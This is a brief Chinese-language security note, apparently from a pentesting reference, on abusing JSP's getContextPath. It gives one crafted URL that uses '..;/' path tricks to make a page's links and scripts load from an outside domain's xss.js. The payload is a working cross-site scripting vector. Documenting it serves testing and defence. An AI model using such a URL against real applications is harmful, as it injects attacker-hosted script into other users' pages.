JSP

Reading time: 0 minutes

getContextPath 滥用

信息来自 here

http://127.0.0.1:8080//rakeshmane.com/xss.js#/..;/..;/contextPathExample/test.jsp

访问该网站时,您可以更改所有链接以请求信息到 rakeshmane.com